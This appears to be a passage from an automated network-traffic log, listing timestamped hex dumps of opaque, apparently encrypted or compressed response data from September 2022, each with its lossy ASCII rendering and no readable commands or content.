                                                                                                                                                    2022-09-29 12:59:14 UTC24359INData Raw: 5c bc 8e 66 fe 4f 01 26 9a 22 aa b6 de 08 23 96 a1 af 94 a7 71 46 ae b5 7d 09 38 4d 9e 31 43 6e 62 76 1f b7 7e 18 e8 c3 12 7e 06 58 fc 97 5d cb ef 74 95 ad 71 44 e9 7f 0c ed a7 98 03 e6 f0 0d 4e 1b e0 3f ef 6c af d1 22 e3 90 b1 64 85 eb b5 30 f2 ca 26 10 ce 6e a0 9a 9e c7 20 43 6f c5 8d b1 0f 3d 9f b3 9a da c5 ce 6e 65 f9 47 22 8e 65 5f 0c 94 4c f6 c6 df 97 79 a9 2b 89 94 9f 40 46 e9 01 d8 c1 17 e7 18 ef a5 4c 69 04 80 51 37 59 07 3c cb 17 4b d4 7d d6 4a 21 4f b7 b4 e0 55 39 37 8f 80 4f ae df 62 85 51 51 56 a1 16 17 28 eb 08 27 65 5c 4b af 93 23 12 73 e0 ca c8 e8 6a 7c 09 95 6a dc 04 20 a2 58 f0 a6 0d 77 82 14 24 8f e5 85 00 e8 cc 54 b3 64 8c 48 82 95 85 fd 24 56 71 9c e5 28 cd 3e 47 dc b9 fb 86 e3 01 fd bb d4 c9 5d d5 80 bf 28 06 39 ad ff fc 20 26 96 b7
                                                                                                                                                    Data Ascii: \fO&"#qF}8M1Cnbv~~X]tqDN?l"d0&n Co=neG"e_Ly+@FLiQ7Y<K}J!OU97ObQQV('e\K#sj|j Xw$TdH$Vq(>G](9 &
                                                                                                                                                    2022-09-29 12:59:14 UTC24375INData Raw: b3 15 8c ab 6c 1d 15 5b 29 70 d6 69 fd 5d 3b 10 b6 06 b5 70 3c 48 2d 1d a1 d2 22 0a aa cb 56 05 50 23 7c 61 9f a5 c1 12 04 4b fe 3e 43 e5 72 b8 45 51 4a 98 fd 63 69 0c eb 55 5e a4 bf 08 ac bc ce 53 0c 78 5e 5e cd e4 fe d8 73 cb 5a 09 4b 7d c5 6e 54 47 9e ed 8f 4a 34 91 68 09 90 91 e3 5b 93 81 c4 0f 58 36 a9 99 89 98 a3 44 0c 54 7f fd bb 0e 49 e6 82 ac 1f 0c 95 40 11 63 11 a3 12 9e c3 12 ad 58 48 6a f8 35 1c d1 c4 4a 38 f9 b3 29 56 52 3e b3 f7 d3 aa 1b fe 25 56 2e ad b9 bd 28 70 43 4d 17 f3 19 f3 d2 58 f9 93 f9 5a 21 bf c0 6c 8b f7 20 37 2c 18 c6 0c e9 46 e2 fb c7 4a 59 db 1c cb 3f 9c 0f a5 7f 44 bd 2f 87 b0 43 68 73 86 ca 5c 9e d0 8f 4f 44 4e ee 95 68 37 6a 2f 56 2f 85 57 1f 42 98 ff 92 6d 05 ec 9f f0 3b d5 49 b7 29 07 bb c0 bc 3d c5 3b 5a df f6 90 14 93
                                                                                                                                                    Data Ascii: l[)pi];p<H-"VP#|aK>CrEQJciU^Sx^^sZK}nTGJ4h[X6DTI@cXHj5J8)VR>%V.(pCMXZ!l 7,FJY?D/Chs\ODNh7j/V/WBm;I)=;Z
                                                                                                                                                    2022-09-29 12:59:14 UTC24391INData Raw: 63 e0 a6 f1 47 7c 47 d9 02 7b a3 02 2d f8 69 19 c1 cc a5 c6 71 b2 1e ec c2 d7 0c 34 20 e9 34 f2 b3 71 9f 93 25 ca 7e 3c ea 5f 1a f2 4c 9f 95 3c 74 ba aa ba eb 14 01 a4 f2 68 56 9d f0 56 f6 30 96 a5 04 e9 ea 59 b3 52 da 83 3b 75 5d 28 88 56 87 47 b6 4a 9d f5 00 c6 d1 8e 41 34 a9 03 9e 9a c1 0f b4 05 71 92 57 7c 71 6b e5 57 6e 6b a1 12 23 bc a1 06 92 99 7f 05 86 b9 bc 71 be 86 84 c7 ff 1c 63 d2 c5 f2 fb cf d2 30 5a fd 36 64 08 3f 2d d8 c3 b9 91 7e a6 3e 43 52 df 2f 50 d0 3e 48 f7 40 de 6c d4 05 9b 3f e6 43 a4 43 08 e0 70 c5 18 b7 d6 45 36 5b ab a6 3c f1 1d fc 4c f1 1b 76 49 64 c8 ea 4e 09 35 e8 e4 af d8 59 5d 92 b3 a5 86 a1 c7 2a e6 a7 34 a9 39 45 8e 63 e7 21 1a f5 41 7d ab ed 80 43 6c 14 c0 0c cf 35 27 c3 0e 11 52 bf 75 0a 4a 9d 3a 4d 2e de 9e 83 d0 08 b7
                                                                                                                                                    Data Ascii: cG|G{-iq4 4q%~<_L<thVV0YR;u](VGJA4qW|qkWnk#qc0Z6d?-~>CR/P>H@l?CCpE6[<LvIdN5Y]*49Ec!A}Cl5'RuJ:M.
                                                                                                                                                    2022-09-29 12:59:14 UTC24407INData Raw: a5 4e 58 a6 49 7d 55 91 62 7b e6 7d 8a e0 eb 9d 73 db ab 72 18 ac bb da 93 f1 38 fc e0 73 2e 89 61 48 06 30 7e e7 0b 38 b4 7a 8c 5b 7b 93 9b b5 fa 68 83 ff ff 6d d9 d1 29 57 ff a0 44 7e 2a fb 8d 33 27 cd 12 1a ee 03 fb 68 35 30 a8 1d 3f cd ad 15 21 06 4f a1 44 99 65 88 99 18 69 40 52 f6 f5 d9 9c 80 79 8b 58 28 c5 7e 5e 49 a6 2d 72 c5 7b ff 0d aa 89 c0 a3 d9 40 6f b8 73 16 6f 65 14 af 00 d1 30 a6 75 b5 24 29 64 5e 13 f9 7c 46 1e f3 d3 69 20 f1 36 c6 e4 34 6c f2 16 2b 85 f6 06 b6 ef 15 f0 06 4a e2 15 dc fc e7 e2 06 5c fe e1 78 6b 05 dd d7 8c 25 c4 06 c4 e9 d4 82 05 8b 8f 17 a0 83 40 c5 5c 33 48 a3 60 c6 2b b9 14 79 bf 31 92 db e5 54 49 26 89 81 a7 5d 2c e3 d0 3d d5 38 ac 0f 31 82 01 8c 96 99 6f b7 51 8a 47 f9 44 36 03 6a f2 b4 a7 5b c6 01 80 f3 b1 ad ea 7b
                                                                                                                                                    Data Ascii: NXI}Ub{}sr8s.aH0~8z[{hm)WD~*3'h50?!ODei@RyX(~^I-r{@osoe0u$)d^|Fi 64l+J\xk%@\3H`+y1TI&],=81oQGD6j[{
                                                                                                                                                    2022-09-29 12:59:14 UTC24423INData Raw: 50 5c d2 a0 a8 73 69 fb 0c 85 3c 0f a8 b1 12 4e 8e cd e6 d1 b2 ff a6 e6 64 a4 66 c2 84 b8 d4 2a ff bc 4d c1 dc fd 2f c5 2a 87 37 4c 97 ea 89 98 d8 87 81 93 67 5f a6 f7 5d dc 7c fe c9 a1 f3 77 08 1d 19 0b 98 23 00 ec 8a 4f af f9 42 dc 8f 95 c3 3e cc ca 0f fc 8d 16 54 e2 88 6d fb 70 9b 3e 8a 1f ad 4b 04 53 9e 1f f3 42 00 15 39 bc 2b 3f 44 80 8a 74 25 3b 2b cb 20 2c ea 3a 11 a6 e2 f8 8b d8 1a 79 04 01 97 7f c5 08 2f 1f d8 1a 37 f6 9a df 9e b2 30 6b ef 43 00 d8 cf ef 33 d8 75 7b 5e 5b a4 02 de 06 0b 26 d4 11 e3 b0 5e 6d 94 b3 f0 dc 98 9c 86 fe fe cf f9 e8 c4 ea b5 4a 0a df ab 13 2f 9c dc c3 36 6f 53 9a 54 44 98 2f 38 31 f1 a9 98 40 48 77 99 42 79 0e 4d 57 01 01 65 b6 d0 4b 3d c3 10 a7 45 cd 14 cd 5a 7f a6 29 09 55 b0 6d b7 b7 70 22 5b 56 f3 a4 3d fb 91 a9 ff
                                                                                                                                                    Data Ascii: P\si<Ndf*M/*7Lg_]|w#OB>Tmp>KSB9+?Dt%;+ ,:y/70kC3u{^[&^mJ/6oSTD/81@HwByMWeK=EZ)Ump"[V=
                                                                                                                                                    2022-09-29 12:59:14 UTC24439INData Raw: 69 77 a8 7c e8 8a 39 2a 08 43 ea d5 77 12 41 d2 d9 89 ef 3f d2 fa 52 20 38 f8 00 6b 71 e9 94 b0 e5 e0 27 72 ee 22 59 e2 31 cd 2d 4e 37 6a b4 bd a6 f2 41 28 96 b6 88 4e 5a a6 33 a4 9d b0 7d 2f 18 29 05 98 97 95 2f 75 d3 90 4a eb c3 f9 8c 01 64 48 ec cd 16 7b 18 6b 77 4f 71 b6 9a 5c b2 9d e3 c0 68 02 40 ed 69 7e 16 8c 17 17 d0 b3 56 b9 e1 65 a6 1d 64 a8 2a 69 45 c3 cc d6 71 85 c3 fb e8 07 c8 9d b4 e6 27 1f ee fb 17 1a 2e 0f e1 b7 81 ab 94 a2 4b 44 69 04 e3 af e3 f0 75 e9 61 2e f9 c6 ed 40 90 c7 4a fc d1 23 52 eb 4e 91 fb 73 d7 14 45 0d d1 d8 4a e9 c2 ee 43 b4 5d b4 58 31 37 8f bb 61 9a 67 9c db e8 71 7a fe 85 ea d9 2f 18 cc d7 a7 78 e1 d4 62 ad 07 7d ae 89 03 97 59 a3 c7 92 a7 d5 5b 11 6c e6 ac 22 0b cb 16 81 5d 69 8b 6a 78 f6 c6 94 6b fb 96 32 af 32 e8 ab
                                                                                                                                                    Data Ascii: iw|9*CwA?R 8kq'r"Y1-N7jA(NZ3}/)/uJdH{kwOq\h@i~Ved*iEq'.KDiua.@J#RNsEJC]X17agqz/xb}Y[l"]ijxk22
                                                                                                                                                    2022-09-29 12:59:14 UTC24455INData Raw: 16 b5 27 e1 f7 fb ba 4b 80 4c b6 0d 76 40 52 79 a1 58 49 6b d8 82 11 9d 16 da ba 15 b5 f2 25 97 50 01 f1 74 10 aa c1 19 df 73 1d 11 77 ff e3 ee 98 6f f0 a2 37 05 45 ac df c3 69 77 c9 f7 60 70 1c ae 23 36 b0 1d 59 b0 ff 32 96 d2 8d be 9b 03 92 08 73 55 85 5f b4 4e d5 ab 77 77 c5 be af fc 5e 38 f0 b9 e4 c0 f4 8e 8e ac 8b 12 4a 7d 6d 91 7d 11 1e 1d f5 09 e0 57 43 7e ce 18 cd fa e6 17 be 98 60 66 1e ed 03 9d 34 75 41 d8 1b 62 27 23 30 97 d3 6b fe 1e 05 ce a0 da 2a c6 70 3a a3 5a 5e 9e 4a aa e6 b2 ea 97 ab 92 d9 d2 34 a5 df a7 08 49 97 88 ed 8a ec f5 ce 15 7a 19 5b 86 be 8e ed 22 1e c9 39 e8 25 83 93 06 15 43 fb d7 dc e0 67 db 85 71 5c 71 a0 9e 38 0f 87 b9 4d 1d 7f 87 a4 d3 0f d5 e1 95 7a 3c 79 82 e4 3f b3 08 c6 63 63 ef e1 35 cd 2b e7 9f be 8c ff 1c db 3d 67
                                                                                                                                                    Data Ascii: 'KLv@RyXIk%Ptswo7Eiw`p#6Y2sU_Nww^8J}m}WC~`f4uAb'#0k*p:Z^J4Iz["9%Cgq\q8Mz<y?cc5+=g
                                                                                                                                                    2022-09-29 12:59:14 UTC24471INData Raw: ea b0 03 e6 93 46 99 a2 92 dd 6c 5c bd 51 61 ff ba 45 6f 81 84 31 e7 6c cd dc 00 92 28 e8 ac 27 c4 17 88 4a 0d 52 26 4a 5e 88 bb c1 0a ec 57 c5 61 1f 60 92 a8 f1 4e 4f 5a 07 82 86 77 00 fd 72 e2 6f 1b c5 bf 8d 35 16 38 f1 d8 9b bd 1d cc c1 d5 80 f2 ee 1d e6 4d 12 19 5c de a7 6a 66 2d c4 b0 b0 f6 7a 48 cf cc 73 bd 05 8d b9 b9 bd b1 fb 5d ff fc 55 03 28 6e 48 78 fe b8 19 42 0a 31 32 da 1a 38 fa b1 61 4f ab 45 fa 15 24 0f 74 dc 6e e9 49 cc ae 84 4f 5d 4d 1c 51 e2 78 7d 32 2c 44 e4 32 26 5e 20 c2 b9 48 07 9f 64 8a 77 d9 e4 a9 a0 c6 19 00 77 03 74 27 c7 8c 2a 90 47 ba 9b 47 0b 59 49 f3 6e 9e 11 12 35 1a 07 c1 f6 ad 44 7d b5 f5 2f ef 2f 86 b5 52 e5 ab 5b 02 2f 80 7e d0 ef 54 53 58 b8 b8 1c e7 40 1c 5e 6c c8 64 68 50 60 82 19 b8 de 9a fb 81 f5 f9 0d 1f fa d8 54
                                                                                                                                                    Data Ascii: Fl\QaEo1l('JR&J^Wa`NOZwro58M\jf-zHs]U(nHxB128aOE$tnIO]MQx}2,D2&^ Hdwwt'*GGYIn5D}//R[/~TSX@^ldhP`T
                                                                                                                                                    2022-09-29 12:59:14 UTC24487INData Raw: 22 86 30 3f ad 3c 8c e2 83 e9 51 90 f9 46 04 8b 05 09 d0 8b 04 5b de c6 cf 68 54 ab 40 7d 25 b2 cb ff 5e bf f3 d3 96 9b 14 3f 64 69 f1 5c ee 7a 6f 75 13 d8 67 44 e6 52 18 df b5 54 96 64 68 83 68 dd b1 76 08 8f 42 32 48 2c e3 08 b7 99 b9 39 d4 34 00 d2 f1 9c ea 13 fb 44 d9 0e 4b 37 55 10 98 c2 27 6e 5f e5 29 f3 67 16 62 fd 6d 2e 0a 54 81 66 51 a8 3c bc 38 2c 3a ce 5c ae d2 50 0e bc 51 5f 98 75 d6 b3 d8 3f 57 4d 3f e3 20 65 dc 62 bc 42 1b bb cd 80 f1 61 9a 83 9d b8 07 60 17 23 f2 a2 ee bf 64 b2 34 ee 67 99 2f 8c d7 c5 65 69 f6 f7 8f 29 9f 50 a1 91 c9 2f ef a2 57 8b c6 3b 58 32 3a 1c 65 fc 8a d5 cf 82 7b db e6 5e 64 e2 ff 00 d5 2d 26 f1 39 93 b7 8d c0 5d bd 48 c2 87 a4 88 28 ce 89 a8 23 31 c3 f6 22 31 8a 2a eb d3 a2 4d dd 6c 1c a5 d0 f2 95 2f 95 df 6a 9a 67
                                                                                                                                                    Data Ascii: "0?<QF[hT@}%^?di\zougDRTdhhvB2H,94DK7U'n_)gbm.TfQ<8,:\PQ_u?WM? ebBa`#d4g/ei)P/W;X2:e{^d-&9]H(#1"1*Ml/jg
                                                                                                                                                    2022-09-29 12:59:14 UTC24503INData Raw: 61 62 58 e9 f2 b7 a4 e6 18 fe 37 f4 23 77 7f bf b2 15 4b 2b fa 46 a4 bb 94 b7 d4 9d 43 1d 86 a7 9e 75 82 98 7e ff 97 4c 97 37 d3 c5 34 a4 6d 0d 5c 5a ca c2 30 ea 78 45 e7 77 6a 40 cd d0 64 db a3 1f 9b 07 c4 5e 62 4d ea 42 0b 58 32 e2 a6 17 2e b5 65 8f 63 e9 1b 87 3a 04 e2 9f ff 2d 99 43 7e e7 d2 2b b1 d7 98 cb 39 fb 99 63 af c4 62 26 15 ba 2b 59 98 c5 96 97 ec c9 3e 77 3a b4 b2 e7 af eb e1 ae c1 7b 31 4a 10 77 83 90 0c ff e0 71 20 a8 a8 ed 08 46 33 0f a9 64 e6 b9 df db f4 6c 7a 81 0e 19 a6 89 19 51 e7 02 71 43 c5 1e 27 40 12 a6 c3 42 2b 47 63 77 28 e4 16 bb 47 fb 84 9e a3 60 7a e1 59 20 a3 db ed e5 bb ad f5 46 9b 0c f4 87 c7 9d 12 c6 14 19 d6 a9 0d 7e 12 dc 9c 13 5c 50 6e d3 84 e0 08 79 78 b3 b8 53 0c 55 a2 2a c0 41 bb ad dc 0f fc 12 77 ff fb 5c b8 b5 e2
                                                                                                                                                    Data Ascii: abX7#wK+FCu~L74m\Z0xEwj@d^bMBX2.ec:-C~+9cb&+Y>w:{1Jwq F3dlzQqC'@B+Gcw(G`zY F~\PnyxSU*Aw\
                                                                                                                                                    2022-09-29 12:59:14 UTC24519INData Raw: b4 01 17 6c d2 24 7f fa 17 c2 2b ab a9 9a 9b d6 a7 e4 33 e3 0d ac 59 c1 79 54 d9 28 dc 39 00 34 fb 75 e7 c7 c8 3d b0 4a 52 d6 76 8a e8 e9 aa 07 99 19 94 a3 41 15 17 e6 fa f4 55 58 11 64 62 3a 9e 33 41 3c ea 4a b8 ab 05 67 60 2f 8b 3f 3e 88 be 9a 22 e6 cc e6 a8 97 10 a3 b2 7e 86 33 53 fd 29 90 05 2f aa 4e 85 b9 ca 26 3b f0 26 5f 3e b2 57 ca c1 73 f9 14 ff 0d c3 eb 2c e9 93 db 65 2d 46 14 71 cc 0d 46 28 b8 1d ff 86 ff ca 85 4e 2d 44 eb 68 30 e9 c8 ac 7a 08 76 c7 2e 30 83 78 2f 0f a1 f3 20 a8 c7 bb 34 bc d3 ba b3 40 7f 74 7e 27 fa b8 2e fd 76 e2 cd e6 05 62 95 57 ea 7e 56 35 d4 5b e2 00 07 9d 49 5a ef 5f 9f 96 3c 78 d4 c6 e6 19 b7 5e f6 f6 68 1a 7d 33 1f ad 08 90 3e 22 7b 4c f9 fd cd 4f 76 72 87 dd 10 e1 ab 0a 31 67 de 75 a0 86 b3 0b d2 60 a6 a8 8b cc 3f 6d
                                                                                                                                                    Data Ascii: l$+3YyT(94u=JRvAUXdb:3A<Jg`/?>"~3S)/N&;&_>Ws,e-FqF(N-Dh0zv.0x/ 4@t~'.vbW~V5[IZ_<x^h}3>"{LOvr1gu`?m
                                                                                                                                                    2022-09-29 12:59:14 UTC24535INData Raw: e3 30 39 6d af d2 67 4b 35 79 45 4b 60 48 fb f0 7b a9 40 6c c5 f2 80 a7 b6 30 6e 78 b5 56 25 10 49 55 98 be b8 72 09 64 65 20 3e 63 cb 49 35 f9 f8 35 ac d0 ce ad 08 48 da 0e 22 38 5d 65 f7 c2 b7 82 34 43 c4 35 4e 69 75 ee 08 d5 81 0b bb 99 16 8e e8 ad 22 fd 7f 3c 76 00 20 70 eb eb e0 06 2f 83 21 ba 13 82 6c 1d 99 ea e9 55 ee b6 65 10 91 7e 12 c6 5f 90 ad 25 53 c7 5a a1 ec c0 54 e0 5a 25 a1 20 13 b2 42 d2 51 60 28 4a 68 35 92 14 ee 6a 1a 73 f4 7e b6 0b d8 07 35 ee e9 2c c8 67 f0 da 5c 6d 28 cd 26 22 56 4e e7 fe f8 ca e0 b0 fc 3d fd f9 9a ff a7 91 08 44 b5 69 e0 9a bd e1 41 f3 8f 6c 62 aa 1a 8d 62 69 df 34 32 c0 8f b2 51 8a d3 93 65 82 4b b1 13 2a 57 d5 aa f1 f6 6f ec a0 85 d5 1a 08 ef 96 91 5e 92 62 37 ef ea 96 ba 0b 26 19 84 ec 9c 14 f4 28 32 c1 15 5e bf
                                                                                                                                                    Data Ascii: 09mgK5yEK`H{@l0nxV%IUrde >cI55H"8]e4C5Niu"<v p/!lUe~_%SZTZ% BQ`(Jh5js~5,g\m(&"VN=DiAlbbi42QeK*Wo^b7&(2^
                                                                                                                                                    2022-09-29 12:59:14 UTC24551INData Raw: de d4 38 a6 b9 22 d5 db 5e 74 b8 45 a1 d2 a7 51 d2 30 da dc 93 5f 15 c7 ac 77 15 7b ef 19 54 aa c5 a4 54 01 56 67 78 dc 1b e9 df 57 6c a7 88 c7 8f 7e 94 32 5d 94 bb a0 ab b3 f8 fa 7f 17 e8 e0 1d 70 66 5a 1a 5c 90 f1 ed e7 29 b8 2e e7 92 0a 85 e7 f1 1e 9d 76 34 f8 af ab 4d 58 f2 46 0d c3 41 1d 2d 71 b2 fd 27 54 59 2d 62 94 0a 55 1b bf d6 0a eb b8 dc b9 24 e2 9d ad b3 10 45 92 94 e9 88 5a ec 79 90 4c ac 70 27 5a 98 9b 81 21 d7 3c ba 1e 41 e2 0a 44 f4 4d 21 b6 d2 ec 4e 1e 30 a9 fc f9 46 b7 57 a3 c8 9e 3d db 26 b7 4c 0e f7 41 49 1c 88 dc b8 16 08 d6 c0 6f db 58 10 ed e3 19 26 c4 03 04 62 32 3b 37 6d 71 35 6c d8 3b c7 8e f5 0d 02 a8 7f f0 2e 2e 75 2e b8 9e 8a 87 68 7b 8a 52 99 02 ce 57 5c 51 af 09 16 9d 87 0b 3d b3 2b ba 61 91 09 cd 6c 0e 95 32 34 68 ac ac 7f
                                                                                                                                                    Data Ascii: 8"^tEQ0_w{TTVgxWl~2]pfZ\).v4MXFA-q'TY-bU$EZyLp'Z!<ADM!N0FW=&LAIoX&b2;7mq5l;..u.h{RW\Q=+al24h
                                                                                                                                                    2022-09-29 12:59:14 UTC24567INData Raw: d4 c8 3d 90 82 41 ff de 0f bd 66 9d 54 ab 98 73 34 2a 61 6a 3d e3 bc d7 35 0c a2 cf 51 0b 9a e8 76 ea 39 e4 2b aa 70 39 fe 8f 73 2c 4f 2b 39 c8 ec 90 1c 4b 26 67 62 8b 26 01 23 82 81 5e df 01 cb 03 e6 2a e6 a5 a0 cd f2 06 95 c2 0f 8f 72 2b b3 c3 e9 ba a9 7e 42 da f7 63 2f 2d c5 ba 19 13 5d 22 e6 c1 f3 05 ef 59 14 7d 79 5d d5 b8 6f 61 b0 5e 9e 56 98 2e 1b 5b 36 45 c1 11 96 38 cd 19 67 79 99 4e a5 d6 4b dc f0 5d 6a 98 56 fa fc 13 dc da 9e 12 98 eb 00 59 b5 7d 1c 02 1a 50 ea 43 8f 3c 38 d9 dd 69 d9 bb 41 d8 b8 89 a8 6c 98 d0 95 17 ff f0 78 a8 fd 96 7f 52 15 83 af 7c a1 27 33 5c 9d 3d 9d 5f b1 99 77 d4 e3 75 dc a9 d3 0b af 94 41 17 45 b7 50 55 09 03 0e a5 9e d0 ce f8 ec 15 55 6c a1 36 e6 14 68 8d 24 cd 8c 62 53 33 cf 38 84 ba 71 77 3d ee 08 82 65 b1 49 7e 50
                                                                                                                                                    Data Ascii: =AfTs4*aj=5Qv9+p9s,O+9K&gb&#^*r+~Bc/-]"Y}y]oa^V.[6E8gyNK]jVY}PC<8iAlxR|'3\=_wuAEPUUl6h$bS38qw=eI~P
                                                                                                                                                    2022-09-29 12:59:14 UTC24583INData Raw: 05 7c 55 aa bc 11 9e 3a c5 3e 8b 11 5d 4e 32 fb 09 45 a7 4e ae a2 ee 27 71 aa 15 68 0c 1a 38 ed 8e 37 58 05 6f 00 8c e4 3e ce 4f a1 56 18 52 3b aa e6 ab 72 b3 f3 cb f3 23 53 7d 39 62 c9 c1 8e d9 30 3c 0d 3b 2a 77 f9 94 b1 41 0b c6 29 43 23 68 e0 85 bb 4f 49 9b 10 03 a1 54 48 f4 d2 58 c8 25 81 34 f5 32 a3 ed b3 50 ed 87 18 4c d5 64 93 80 5c 5a c9 ed 2b 0d 1d 91 34 67 06 31 15 bf ea 2a 1b 4e fd a2 ce b4 f8 4d 60 ab 25 0c 93 63 69 83 08 86 0a c1 79 4d 98 de 77 97 87 f9 7e 58 6f 74 25 dc 32 7e a9 9a 92 f7 3a c5 0e b0 ed 73 5a de 02 ff 48 18 54 89 c2 7c fb 77 bf d6 57 7b 9f 41 fd fb ee cf fc c2 fb 7a 73 67 66 19 b4 f9 29 be 41 2c e9 8d 81 1e c8 da f0 79 a5 3b a5 3a 72 63 27 e4 98 f8 bd d0 54 0e 51 49 c7 49 e1 eb fe bf 19 b1 33 39 e7 53 8b ed e5 f9 b5 2d 05 06
                                                                                                                                                    Data Ascii: |U:>]N2EN'qh87Xo>OVR;r#S}9b0<;*wA)C#hOITHX%42PLd\Z+4g1*NM`%ciyMw~Xot%2~:sZHT|wW{Azsgf)A,y;:rc'TQII39S-
                                                                                                                                                    2022-09-29 12:59:14 UTC24599INData Raw: e4 bf d9 a4 41 36 fe d1 df 48 84 09 28 d2 8f ec c0 0e dc e9 e9 88 de 71 fa 42 6b 08 9d b5 e2 2c dd b6 50 fc 7d 3b 31 b0 2a 3f ed 63 2d f8 6c 78 5d 38 fe 75 9f 89 3f 93 f8 bf f9 66 0a 6e 3a d4 71 c5 07 c7 25 e2 fd b4 46 91 7c e9 63 cd 63 91 5c 13 df 47 bc bd 1c da d9 28 37 18 af cf d8 b7 3b 31 6d 88 0a 2f 78 2b 6a 3f d9 cd ea 80 82 5f e5 32 2c d1 9e 31 ca 94 e7 ee 19 45 5d 1b e5 3c 15 bd 7f e5 bc 32 f9 f8 9f 9d d0 d6 c1 89 f5 d8 bf 10 b2 bf 87 94 ba 4f 66 10 de fe c5 b8 ec 1c 23 cd 89 28 a3 57 a7 41 62 c7 f6 77 32 cc 9d aa 20 0d f6 1c 1c 79 bd 28 10 ab 46 26 35 7a 20 78 a4 8b e3 a7 a3 0e 39 a9 8a be 5e ff 3b 80 5f ed ae 7b 61 db a3 e8 e7 9b 8d 87 7c 6d f4 77 03 b4 59 ab df 89 b8 14 5a 97 80 fd da fd 40 18 ca 35 7c 5b 2a 6f 39 ac 9d 41 35 26 8e ac 8c 80 65
                                                                                                                                                    Data Ascii: A6H(qBk,P};1*?c-lx]8u?fn:q%F|cc\G(7;1m/x+j?_2,1E]<2Of#(WAbw2 y(F&5z x9^;_{a|mwYZ@5|[*o9A5&e
                                                                                                                                                    2022-09-29 12:59:14 UTC24615INData Raw: 0c 85 b6 cb 2a 42 9a ed 1b c6 5a b9 99 69 c1 d2 d4 de af 45 1e 6d 29 4d e3 8a 24 4d d5 21 5f ad 94 d3 87 84 64 0d ae 5b 97 4b 4f 80 b7 50 c7 47 8d 01 56 36 68 5c bb 99 31 5a 02 ad 12 70 cc fa 0a 23 5e 37 c5 d5 0f 28 82 ea 29 1e ae 3c 5b 0d c1 10 08 93 e2 8b 56 5e 52 75 2c 91 c8 22 88 b2 83 f4 04 cc 82 dc 01 27 77 5d 78 ce 27 fc d4 86 1a c2 de 10 89 9e a8 ab 69 0b 28 a3 43 cd a7 72 cf 75 87 20 70 c2 9a 4f ca c2 7a 67 7a 0f b0 07 90 3e 44 dc 9f 8d ed a9 40 5d 8b d2 d4 f7 3f 4d 58 d4 dd 61 70 73 dd 0c e6 42 ba b9 53 0d 3a 96 b4 c9 1a d8 60 90 04 38 74 25 a9 b5 f1 22 d1 a4 d1 00 d9 6f e3 76 1a cc 39 c6 5b 51 1b 7d 52 c0 e8 d1 08 d9 74 9b 9d 54 7a 7f 22 d2 80 66 29 96 0a 0b 4b 1e 9c 8a 47 eb dc b4 1a 01 10 ff ec 18 38 e6 fb 98 bf 3a 0a ac 9c 88 29 1d 76 9f dd
                                                                                                                                                    Data Ascii: *BZiEm)M$M!_d[KOPGV6h\1Zp#^7()<[V^Ru,"'w]x'i(Cru pOzgz>D@]?MXapsBS:`8t%"ov9[Q}RtTz"f)KG8:)v
                                                                                                                                                    2022-09-29 12:59:14 UTC24631INData Raw: 6f 7e 08 b5 37 e9 3e 83 1b 49 2e 21 7f 3c c4 71 99 0c cb 3b 5f 7d ef a7 5f 92 7f 22 f5 2a e4 b8 0d ff b0 03 ca 95 0b 4f 2f 71 64 07 f9 9f d2 90 2a 2a 20 08 6e d7 ce 2d ab b0 84 91 98 da 76 cc 40 47 33 44 f5 39 f1 83 ae c6 f4 74 87 1d 03 ee 3d e2 0b 24 a4 81 d5 ea bf 6d 88 f8 f7 f2 55 f7 c7 95 c3 3c e3 aa 71 eb 54 92 e9 25 0a 04 a6 4c 1e 1f 18 64 09 b6 27 45 50 c8 08 18 e2 24 7c 0e a1 07 a5 14 c1 be 93 7e 1c 85 f0 36 f7 5e 6a 00 b2 c6 fa 93 ef 7f 52 df 53 80 f4 03 77 a4 f8 64 1a 8c 48 b9 e7 65 75 55 c5 98 c4 e6 cc 2d 5e 73 b4 1c 24 87 5f ba 51 c6 c0 28 06 a0 71 ea 2c 19 10 e9 d0 f3 d0 d3 50 74 8c 44 55 3a 24 ad 2d f2 cd 21 ff 1b 58 fd 22 d1 9d 9b 1b 34 03 07 e4 e2 92 07 5c 48 9a c1 04 77 a8 d1 98 de ae e6 df 71 95 d6 8d 35 b2 38 8b 15 30 86 ad 48 6e 47 51
                                                                                                                                                    Data Ascii: o~7>I.!<q;_}_"*O/qd** n-v@G3D9t=$mU<qT%Ld'EP$|~6^jRSwdHeuU-^s$_Q(q,PtDU:$-!X"4\Hwq580HnGQ
                                                                                                                                                    2022-09-29 12:59:14 UTC24647INData Raw: 02 f5 fb 93 e1 5d 29 83 65 fe 44 34 60 a4 cc 97 51 d1 ae 80 c0 a9 e8 36 52 c5 09 6e ea 75 65 bb 83 49 8e 0c f3 67 27 d8 aa a8 4b 18 a6 9b dd 36 a8 eb 51 60 a0 8d cc 64 6a 07 ac 0f ed 68 e3 a5 ed 83 87 a2 34 8c 11 5e 6b a5 68 73 d5 31 6f 6d 3c 55 a1 cc fc 4f 95 01 b6 23 41 22 9c ee fa c8 19 b8 dd d4 00 17 14 c9 8d 71 75 03 bc 89 16 91 49 4e d8 b5 67 ed 66 2b 89 cf a7 a5 e2 3e 0d 0a e6 4f 7f c8 db e7 ea 29 e7 28 cc fa 72 45 b0 74 08 d4 ba 0d 64 f6 ec 43 69 2b fd f1 09 94 b1 0d 69 74 9d f9 51 f2 50 13 c5 55 16 16 2d ff 8b 6b ae 75 34 85 da bb c8 0c 66 f1 30 eb fb 71 f6 f2 92 0f c8 94 e7 e9 5c dc aa 73 64 bf 7b cc a6 e3 6f c9 68 a8 7d 42 42 ea a9 ff 51 ff e0 a4 90 1f cf 5a d9 85 57 e9 8b 3e 31 e5 f8 c1 30 b1 9a a5 09 dd ec 11 7a d1 e1 6c 10 de 1f 08 c3 61 e0
                                                                                                                                                    Data Ascii: ])eD4`Q6RnueIg'K6Q`djh4^khs1om<UO#A"quINgf+>O)(rEtdCi+itQPU-ku4f0q\sd{oh}BBQZW>10zla
